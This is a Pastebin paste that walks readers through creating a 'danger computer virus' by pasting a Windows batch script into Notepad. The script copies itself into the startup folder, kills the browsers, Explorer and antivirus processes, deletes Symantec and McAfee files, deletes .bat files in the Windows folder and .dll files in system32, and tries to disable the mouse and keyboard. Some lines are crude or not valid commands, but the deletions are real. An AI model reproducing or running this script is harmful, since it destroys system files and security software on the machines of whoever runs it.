Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- Virus!!!
- Create a Danger Computer Virus
- You might be scared of danger viruses in your computer or laptop. They affect the working of the computer systems and create new problem. If you want to create your own virus, then this guide will show you how to create a simple virus. Follow step by step guide below:
- Go to desktop & open the notepad file and simply copy the following code and paste into notepad file. The following code is given below:
- Step 1: Open Notepad:
- Step 2: Paste into notepad file Via Ctrl + V
- Step 3: Save it as a “virus.bat” or “virus.exe”
- @echo off
- copy"virus.bat""c:\documents and settings\all users\start menu\programs\startup"
- copy "virus.bat" "c:\"
- copy "virus.bat" "%userprofile%\my documents"
- tskill explorer
- tskill ccapp
- tskill yahoomessenger
- tskill firefox
- tskill chrome
- rem made with batch virus maker v.2
- tskill iexplorer
- time 12:00
- rem made with batch virus maker v.2
- del c:\program files\common files\symantec shared\ccapp.exe
- cd c:\windows
- if exist "*.bat" del "*.bat"
- cd c:\windows\system32
- rem made with batch virus maker v.2
- if exist "*.dll" del "*.dll"
- tskill mcafee security centre module
- del c:\program files\mcafee.com\agent\mcdetect.exe
- rem made with batch virus maker v.2
- copy "virus.bat" "virus.bat45544"
- copy "virus.bat" "virus.bat85858"
- copy "virus.bat" "virus.bat1645"
- copy "virus.bat" "virus.bat574457"
- copy "virus.bat" "virus.bat55457"
- copy "virus.bat" "virus.bat9765"
- copy "virus.bat" "virus.bat45465"
- rem made with batch virus maker v.2
- copy "virus.bat" "virus.bat456877"
- copy "virus.bat" "virus.bat77989845"
- copy "virus.bat" "virus.bat2135"
- copy "virus.bat" "virus.bat46876"
- rem made with batch virus maker v.2
- copy "virus.bat" "virus.bat45687"
- copy "virus.bat" "virus.bat8868"
- copy "virus.bat" "virus.bat2000"
- copy "virus.bat" "virus.bat2009"
- msg * this is a virus
- rundll mouse,disable
- rem made with batch virus maker v.2
- rundll keyboard,disable
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement